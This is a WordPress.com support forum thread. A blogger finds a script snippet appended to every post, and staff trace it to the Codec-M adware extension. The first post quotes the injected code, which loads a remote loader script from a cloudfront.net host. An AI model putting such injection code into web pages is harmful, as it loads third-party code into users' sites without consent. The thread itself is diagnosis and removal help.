Weird ink appears at the bottom of new post when i press update

  • Author
    Posts
  • #879221

    casamah
    Member

    I just recently created my new blog. But everytime i write anything, whether on the about me section or a new post, and then i place update to save it, a weird link automatically comes at the bottom of what i wrote:

    // -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
    // ]]>

    I tried deleting it, i tried deleting my blog and recreating it… and nothing helped. I still get the same link on every new post or every new page or anything i try to add on my blog.

    Can anyone help me solve this problem?

    The blog I need help with is recreateurself.wordpress.com.

    #879422

    raincoaster
    Member

    Can you give us a link to your blog, starting with http?

    #879424

    casamah
    Member
    #879425

    raincoaster
    Member

    Thanks. This is very unusual. It looks like staff are tinkering with the theme to perhaps put more ads in or something. Do you have any upgrades at all?

    #879427

    casamah
    Member

    The thing is i tried different themes. I changed the theme over 4 times and with each new theme, it does the same thing. I don’t have any upgrades. I only have this one blog which i recreated yesterday after having deleted my old blog because of the same problem.

    And it’s still doing the same thing till now. Even in the About me section, i get the same weird link when i press update.

    I checked everywhere online to see if i could actually delete my whole account with wordpress and activate another one, but there is no option of deleting an account.

    #879429

    raincoaster
    Member

    I don’t think this is anything you’re doing and I don’t think it’s anything you can fix right now. That it’s happened on two separate blogs is an indication it’s a WP-wide issue. It LOOKS to me like ad code that’s broken.

    In my experience, staff tinkers like this on the weekends. They should have it fixed by tomorrow; if not come back and update us. Just wait it out, don’t delete anything, and check back tomorrow.

    #879430

    casamah
    Member

    Cool. Thanks for your help. I’ll try again tomorrow and check back.

    #879543

    casamah
    Member

    Hi. I’ve been trying this whole week and still, the link is appearing at the bottom of every page or post i edit or write.

    The problem has not been solved yet, what do i do?

    #879544

    I’ll modlook this thread, hopefully someone from staff will see it then.

    In the meantime, I did a Google search on the ‘cloudfront.net’ from the code you gave and found it’s an Amazon service:

    http://aws.amazon.com/cloudfront/

    and, while the answers aren’t always brilliant, this from yahoo answers addresses a similar issue, I think:

    What the hell is cloudfront.net

    Hope that gives some clues. I suggest that, for now, you clear your cache and then log back in and see if it helps. If it doesn’t then, as Raincoaster says, it’s probably WordPress.com mucking about with something new and there won’t be anything you can do yourself.

    If it does turn out to be an ad they’ve placed, then you can buy the no-ads upgrade – but anyway you shouldn’t be seeing any ads in your blog while you’re logged in, they only appear (if there are any) to logged out users.

    #879549

    macmanx
    Staff

    I have seen something like that before injected by a browser extension.

    Would you please try posting with all browser add-ons and extensions disabled?

    #879565

    casamah
    Member

    Thanks guys. Can you just help me out with the following:
    how do i clear my cache. I’m on a mac if that helps.

    Also, how to disable all add-ons?

    Thanks.

    #879566

    timethief
    Member

    Clearing your browser cache and cookies > http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=32050
    Type the name of the browser and version number folowed by disable browser add-ons into Google search and find the instructions for disabling brower add-ons and extensions.

    #879578

    casamah
    Member

    I cleared cache. i DISABLED browser add-ons. And this is still happening :SSSS
    i wanna get my blog online and i can’t!

    #879580

    macmanx
    Staff

    Can you please tell us which browser (and version of) you’re using?

    #879586

    casamah
    Member

    Firefox 12.0

    it’s not the browser. i tried signing and editing from another laptop and the same thing keeps happening. I am an administrator for another blog. and on both blogs, the same thing is happening.

    please help. if i can’t fix this issue. can i just cancel my account and reactivate with the same email address?

    #879588

    macmanx
    Staff

    That wouldn’t help, because it’s definitely not us.

    If you do a Google search for “cloudfront.net/items/loaders” you’ll see many sites affected with the same problem.

    In past reports, there was a browser extension called Codec-M inserting this text.

    Does your browser have a Codec-M extension or add-on?

    #879591

    casamah
    Member

    I do but i disabled it and restarted firefox.
    should i delete it? how do i do that? is it in applications or something?

    #879592

    macmanx
    Staff

    Disabling it should be fine. If you want to delete it, follow this guide: http://support.mozilla.org/en-US/kb/Uninstalling%20add-ons#w_how-to-remove-extensions-and-themes

    #879593

    casamah
    Member

    Thanks for the link.

    I did disable it and restarted firefox but it’s still not resolved. I cannot update or add any posts without that link showing at the bottom.

    it’s not working!

    #879594

    macmanx
    Staff

    Ah, it looks like there’s more installed than just an add-on.

    I did a quick search for “uninstall codec-m” and found a few different recommendations.

    I have never done this myself for Codec-M, so I’m not comfortable recommending any specific method.

The topic ‘Weird ink appears at the bottom of new post when i press update’ is closed to new replies.